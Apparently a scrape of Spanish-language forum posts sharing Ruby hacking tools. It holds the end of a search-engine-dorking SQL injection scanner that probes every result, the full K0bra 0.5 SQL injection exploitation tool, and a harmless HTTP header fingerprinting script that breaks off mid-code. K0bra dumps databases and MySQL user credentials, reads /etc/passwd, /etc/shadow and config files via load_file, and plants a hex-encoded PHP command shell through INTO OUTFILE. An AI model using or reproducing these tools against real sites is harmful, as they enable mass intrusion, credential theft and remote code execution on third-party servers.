def google_recursive(dork,pages)
  dork = dork.sub(/ /,"+")
  contador = 0
  guardo = []
  for i in ("1"..pages)
    contador+=10
    url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
    code = toma_ssl(url)
    links = URI::extract(code)
    links.each do |link|
      if link=~/cache:(.*?):(.*?)\+/
        link_final = "http://"+$2
        link_final = URI::decode(link_final)
        guardo.push(link_final)
      end
    end
  end
  guardo = guardo.uniq
  return guardo
end

# Query Bing for `dork` and return the de-duplicated links found in <h2> and
# <h3> result headings, skipping links under http://778802.r.msn.com/.
# `pages` is a String and bounds the loop through the range ("1"..pages).
def bing(dork,pages)
  guardo = []
  dork = dork.sub(/ /,"+")
  contador = 0
  for i in ("1"..pages)
    contador+=10
    code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
    links = code.scan(/<h2><a href="(.*?)" h/)
    links.flatten.each do |link|
      link_final = URI::decode(link)
      if not link_final=~/http:\/\/778802\.r\.msn\.com\//
        guardo.push(link_final)
      end
    end
    links = code.scan(/<h3><a href="(.*?)" h/)
    links.flatten.each do |link|
      link_final = URI::decode(link)
      if not link_final=~/http:\/\/778802\.r\.msn\.com\//
        guardo.push(link_final)
      end
    end
  end
  guardo = guardo.uniq
  return guardo
end

#

# Main window: dork and page-count entries, a text console and a button.
window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
  background "black"
  foreground "green"
  text " Dork : "
  place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
  background "black"
  foreground "green"
  width 25
  place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
  background "black"
  foreground "green"
  text " Pages : "
  place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
  background "black"
  foreground "green"
  width 25
  place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
  background "black"
  foreground "green"
  text "Console"
  place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
  background "black"
  foreground "green"
  width 30
  height 9
  place('relx'=>0.1,'rely'=>0.4)
end

# The button callback collects links from Bing, cuts each after its last "="
# with cortar(), appends the fixed suffix below and reports [OK] when the
# response contains the MySQL "different number of columns" error text.
# Defender note: the test only succeeds where the application returns database
# error text to the client and builds its query from the raw parameter.
# Suppressing error output removes the signal and parameterised queries remove
# the flaw. The literal probe suffix together with the static User-Agent is a
# stable signature for access-log or WAF rules.
TkButton.new(window) do
  text "Search"
  background "black"
  foreground "green"
  width 17
  activebackground "green"
  highlightbackground "green"
  command proc{
    # Rebinds the outer `dork` and `pages` (entry widgets) to their strings.
    dork = dork.value.to_s
    pages = pages.value.to_s
    console.insert("end", "[+] Searching in Bing ...\n\n")
    links = cortar(bing(dork,pages))
    console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")
    if links.count.to_s=="0"
      console.insert("end","[-] Links not found\n")
    end
    links.flatten.each do |link|
      console.insert("end", "[+] Link : "+link)
      begin
        url = toma(link + "-1+union+select+1--")
        if url=~/The used SELECT statements have a different number of columns/
          console.insert("end"," [OK]\n\a\a")
        else
          console.insert("end", " [FAIL]\n")
        end
      rescue
        console.insert("end"," [FAIL]\n")
      end
    end
    console.insert("end", "\n[+] Finished")
  }
  place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?
Una imagen : Eso es todo.
|
|
|
54
|
Programación / Scripting / [Ruby] K0bra 0.5
|
en: 24 Julio 2015, 18:12 pm
|
Version mejorada de este script en Ruby para scannear la vulnerabilidad SQLI en una pagina. El script tiene las siguientes opciones : - Comprobar vulnerabilidad
- Buscar numero de columnas
- Buscar automaticamente el numero para mostrar datos
- Mostrar tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar informacion sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
El codigo : #!usr/bin/ruby #K0bra 0.5 #(C) Doddy Hackman 2015 require "net/http" require "open-uri" $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/log
s/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf'
,'/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cn
f','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog'] def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def decode_hex(text) text = text.sub("0x","") return [text].pack('H*')[0] end def encode_hex(text) return "0x"+text.unpack('H*')[0] end def copyright() print "\n-- == (C) Doddy Hackman 2015 == --\n" gets.chomp exit(1) end def installer() dir = Dir::pwd+"/"+"logs_webs" if not FileTest::directory?(dir) Dir::mkdir(dir) end end def savefile(file,text) url = URI.parse(file) save = File.open("logs_webs/"+url.host+".txt","a") save.puts text+"\n" save.close end def bypass(op) if op=="--" return "+","--" elsif op=="/*" return 
"/**/","/**/" elsif op=="%20" return "%20","%00" else return "+","--" end end def head() clean() print " @ @@ @ @@ @ @ @@ @ @@ @ @ @ @ @ @ @@@ @ @ @ @ @@ @ @@@ @ @ @@ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @@@ @@@@@ " end def volverinicio() print "\n\n[+] Press any key to continue\n\n" gets.chomp inicio() end def clean() if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/ system("cls") else system("clear") end end def retorno(url,by) print "\n[+] Finished" print "\n\n[+] Press any key to continue\n\n" gets.chomp central(url,by) end def gettables(url,by) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))") print "\n[+] Getting tables ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Tables Found : ",total,"\n\n" savefile(url,"\n[+] Tables Found : #{total}\n") for num in ("17"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Table Found : "+table+"\n" savefile(url,"[+] Table Found : #{table}") end end else print "[-] Not Found\n" end end def getcolumns(url,by,tablex) tablexa = encode_hex(tablex) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))") print "\n[+] Getting columns ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Columns Found : ",total,"\n\n" savefile(url,"\n[+] Table : #{tablex}") savefile(url,"[+] Columns Found : #{total}\n") for num in ("0"..total) code2 = 
toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Column Found : "+table+"\n" savefile(url,"[+] Column Found : #{table}") end end else print "[-] Not Found\n" end end def getdbs(url,by) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))") print "\n[+] Getting DBS ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] DBS Found : ",total,"\n\n" savefile(url,"\n[+] DBS Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] DB Found : "+table+"\n" savefile(url,"[+] DB Found : #{table}") end end else print "[-] Not Found\n" end end def gettablesbydb(url,by,dbx) data = encode_hex(dbx) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))") print "\n[+] Getting tables ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Tables Found : ",total,"\n\n" savefile(url,"\n[+] DBS : #{dbx}") savefile(url,"[+] Tables Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Table Found : "+table+"\n" savefile(url,"[+] Table Found : #{table}") end end else print "[-] Not Found\n" end end def getcolumnsbydb(url,by,db,tab) data = encode_hex(db) tabx = encode_hex(tab) 
pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))") print "\n[+] Getting columns ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Columns Found : ",total,"\n\n" savefile(url,"\n[+] DB : #{db}") savefile(url,"[+] Table : #{tab}") savefile(url,"[+] Columns Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Column Found : "+table+"\n" savefile(url,"[+] Column Found : #{table}") end end else print "[-] Not Found\n" end end def mysqluser(url,by) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))") print "\n[+] Searching mysql.user\n\n" code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Users Mysql Found : ",total,"\n\n" savefile(url,"[+] Users Mysql Found : "+total+"\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/ host,user,passw = $1,$2,$3 print "[Host] : "+host print " [User] : "+user print " [Pass] : "+passw+"\n" savefile(url,"[Host] : "+host) savefile(url,"[User] : "+user) savefile(url,"[Pass] : "+passw+"\n") end end else print "[-] Not Found\n" end end def details(url,by) pass1,pass2 = bypass(by) hextest = "0x2f6574632f706173737764" #/etc/passwd hextest = 
"0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt web1 = url.sub(/hackman/,"0x4b30425241") web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)") web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))") print "\n[+] Extrating information of the DB\n" code1 = toma(web2) if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/ user,data,ver = $1,$2,$3 print "\n[+] Username : "+user print "\n[+] Database : "+data print "\n[+] Version : "+ver+"\n\n" savefile(url,"\n[+] Username : "+user) savefile(url,"[+] Database : "+data) savefile(url,"[+] Version : "+ver+"\n") else print "[-] Not Found\n" end code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) code4 = toma(web3) if code2=~/K0BRA/ print "[+] Mysql User : ON\n" savefile(url,"[+] Mysqluser : ON") end if code3=~/K0BRA/ print "[+] information_schema : ON\n" savefile(url,"[+] information_schema : ON") end if code4=~/ERTOR854/ print "[+] load_file : ON\n" savefile(url,"[+] load_file : ON") end savefile(url,"") #espacio en blanco end def dumper(url,by,table,col1,col2) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))") print "\n[+] Getting Values ...\n\n" code1 = toma(web1+pass1+"from"+pass1+table+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 savefile(url,"\n[+] Table : "+table) savefile(url,"[+] Column 1 : "+col1) savefile(url,"[+] Column 2 : "+col2) print "[+] Values Found : ",total,"\n" savefile(url,"\n[+] Values Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/ uno,dos = $1,$2 print "\n[+] "+col1+" : "+uno+"\n" print "[+] "+col2+" : "+dos+"\n" savefile(url,"\n[+] "+col1+" : 
"+uno) savefile(url,"[+] "+col2+" : "+dos) end end else print "[-] Not Found\n" end end def fuzzfile(url,by) pass1,pass2 = bypass(by) print "\n[+] Fuzzing Files with load_file ....\n" $files.each do |file| res = file file = file.chomp file = encode_hex(file) web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))") code = toma(web1) if code=~/ERTOR854(.*?)ERTOR854/m print "\n\n[File Found] : ",res print "\n\n[Source Start]\n" print $1 print "\n[Source End]" savefile(url,"\n[File Found] : "+res) savefile(url,"\n[Source Start]\n") savefile(url,$1) savefile(url,"\n[Source End]") end end print "\n" end def abrirfile(url,by,file) pass1,pass2 = bypass(by) print "\n[+] Opening file ....\n" res = file file = encode_hex(file) web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))") code = toma(web1) if code=~/ERTOR854(.*?)ERTOR854/m print "\n\n[File Found] : ",res print "\n\n[Source Start]\n" print $1 print "\n[Source End]\n" savefile(url,"\n[File Found] : "+res) savefile(url,"\n[Source Start]\n") savefile(url,$1) savefile(url,"\n[Source End]\n") else print "\n\n[-] Error\n\n" end end def into(url,by,full,dir) pass1,pass2 = bypass(by) linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e" lugar = full+"/cmd.php" lugardos = dir+"/cmd.php" h = URI.parse(url) webtest = "http://"+h.host+lugardos web1 = url.sub(/hackman/,linea) formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2 toma(formandoweb) code = toma(webtest) if code=~/Mini Shell By Doddy/ print "\n[Shell Up] : "+webtest+"\n" savefile(url,"\n[Shell Up] : "+webtest+"\n") else print "\n\n[-] Error\n" end end def central(url,by) clean() head() print "\n\n[+] Page : #{url}\n" print "[+] ByPass : #{by}\n\n" print 
"\n[information_schema]\n\n" print "1 - Show tables\n" print "2 - Show columns of the a table\n" print "3 - Show databases\n" print "4 - Show tables from the a DB\n" print "5 - Show columns from the a table of the DB\n" print "\n[mysql.user]\n\n" print "6 - Show users\n" print "\n[Others]\n\n" print "7 - Show details\n" print "8 - Dump data\n" print "9 - Fuzz Files with load_file\n" print "10 - Load files with load_file\n" print "11 - Create Shell\n" print "12 - Show log\n" print "13 - Change target\n" print "14 - Exit\n\n\n" print "[+] Option : " op = gets.chomp print "\n" if op == "1" gettables(url,by) retorno(url,by) elsif op == "2" print "\n[+] Table : " table = gets.chomp getcolumns(url,by,table) retorno(url,by) elsif op == "3" getdbs(url,by) retorno(url,by) elsif op == "4" print "\n[+] DB : " db = gets.chomp gettablesbydb(url,by,db) retorno(url,by) elsif op == "5" print "\n[+] DB : " db = gets.chomp print "\n[+] Table : " tab = gets.chomp getcolumnsbydb(url,by,db,tab) retorno(url,by) elsif op == "6" mysqluser(url,by) retorno(url,by) elsif op == "7" details(url,by) retorno(url,by) elsif op == "8" print "\n[+] Table : " table = gets.chomp print "\n[+] Column 1 : " col1 = gets.chomp print "\n[+] Column 2 : " col2 = gets.chomp dumper(url,by,table,col1,col2) retorno(url,by) elsif op == "9" fuzzfile(url,by) retorno(url,by) elsif op == "10" print "\n[+] File : " file = gets.chomp abrirfile(url,by,file) retorno(url,by) elsif op == "11" print "\n[Full Source Discloure] : " full = gets.chomp print "\n[Directory to test] : " dir = gets.chomp into(url,by,full,dir) retorno(url,by) elsif op == "12" urla = URI.parse(url) ar = "logs_webs/"+urla.host+".txt" system("start #{ar}") retorno(url,by) elsif op == "13" inicio() elsif op == "14" copyright() else retorno(url,by) end end def findlength(url,by) pass1,pass2 = bypass(by) z = "1" print "\n[+] Finding columns lenght ...\n\n" x = "concat(0x4b30425241,1,0x4b30425241)" for num in ('2'..'25') z = z+","+num x= 
x+","+"concat(0x4b30425241,"+num+",0x4b30425241)" code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x) if code=~/K0BRA(.*?)K0BRA/ print "[+] The Page has "+num+" columns\n" print "[+] The number "+$1+" print data" z = z.sub($1,"hackman") sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z savefile(url,"[+] SQLI : "+sqli) savefile(url,"[+] Bypass : "+by+"\n") central(sqli,by) end end print "[-] Columns lenght not found\n" volverinicio() end def testvul(page,by) pass1,pass2 = bypass(by) print "\n\n[+] Testing vulnerability ...\n\n" codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2) codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2) if codeuno != codedos print "[+] Vulnerable !\n" findlength(page,by) else print "[-] Not vulnerable\n" print "\n[+] Scan anyway y/n : " op = gets.chomp if op == "y" findlength(page,by) else volverinicio() end end end def inicio() clean() head() print "\n\n[+] Page : " page = gets.chomp print "\n[+] Bypass : " by = gets.chomp if page=~/hackman/ central(page,by) else testvul(page,by) end end installer() inicio() # The End ?
Eso es todo.
Programación / Scripting / [Ruby] HTTP FingerPrinting 0.2
en: 12 Julio 2015, 17:27 pm
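Un simple script en Ruby para hacer HTTP FingerPrinting. Version consola :

#!/usr/bin/ruby
#HTTP FingerPrinting 0.2
#(C) Doddy Hackman 2015

require "net/http"

# Functions

# Sends one `HEAD /` request to +page+ and returns the response headers as
# printable text, one "[+] name : value" line per header.
#
# The request uses Net::HTTP's defaults for a bare host name, i.e. plain HTTP;
# nothing in this script enables TLS. Any failure (unresolvable host, refused
# connection, ...) is reported as the literal string "Error".
#
# @param page [String] host name or address, without scheme or path
# @return [String] formatted header lines, or "Error"
def httpfinger(page)
  # Block form closes the connection even when the HEAD request raises; a
  # separate start/finish pair would skip the close on that path.
  Net::HTTP.start(page) do |http|
    # Header names and values are chosen by the remote server and are passed
    # through unmodified, so the returned text is untrusted input.
    http.head("/").each_header.map { |name, value| "[+] " + name + " : " + value + "\n" }.join
  end
rescue StandardError
  "Error"
end

# Prints the command-line usage line.
def uso
  print "\n[+] Sintax : ruby httpfinger.rb <target>\n"
end

# Prints the program banner.
def head
  print "\n-- == HTTP FingerPrinting 0.2 == --\n\n"
end

# Prints the closing credit line.
def copyright
  print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

#

target = ARGV[0]

head

if target
  print "\n[+] Searching ...\n\n"
  print httpfinger(target)
  print "\n[+] Finished\n"
else
  uso
end

copyright

#The End ?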
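Version Tk :

#!/usr/bin/ruby
#HTTP FingerPrinting 0.2
#(C) Doddy Hackman 2015

require "tk"
require "net/http"

# Functions

# Sends one `HEAD /` request to +page+ and returns the response headers as
# printable text, one "[+] name : value" line per header.
#
# The request uses Net::HTTP's defaults for a bare host name, i.e. plain HTTP.
# Any failure is reported as the literal string "Error".
#
# @param page [String] host name or address, without scheme or path
# @return [String] formatted header lines, or "Error"
def httpfinger(page)
  # Block form closes the connection even when the HEAD request raises.
  Net::HTTP.start(page) do |http|
    # Header text comes from the remote server and is passed through as-is.
    http.head("/").each_header.map { |name, value| "[+] " + name + " : " + value + "\n" }.join
  end
rescue StandardError
  "Error"
end

#

window = TkRoot.new { title "HTTP FingerPrinting 0.2 Coded By Doddy H" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
  background "black"
  foreground "cyan"
  text " Target : "
  place('relx'=>"0.1",'rely'=>"0.1")
end

# Entry widget holding the host name typed by the user.
target = TkEntry.new(window){
  background "black"
  foreground "cyan"
  width 25
  place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
  background "black"
  foreground "cyan"
  text "Console"
  place('relx'=>0.4,'rely'=>0.2)
end

# Text widget used as the output console.
console = TkText.new(window) do
  background "black"
  foreground "cyan"
  width 30
  height 10
  place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
  text "Search"
  background "black"
  foreground "cyan"
  width 17
  activebackground "cyan"
  highlightbackground "cyan"
  command proc{
    # Read the entry into its own local. Assigning the string back to `target`
    # would replace the TkEntry, and the next click would then call `.value`
    # on a String.
    host = target.value.to_s
    console.insert("end","[+] Searching ...\n\n")
    console.insert("end",httpfinger(host))
    console.insert("end","\n[+] Finished")
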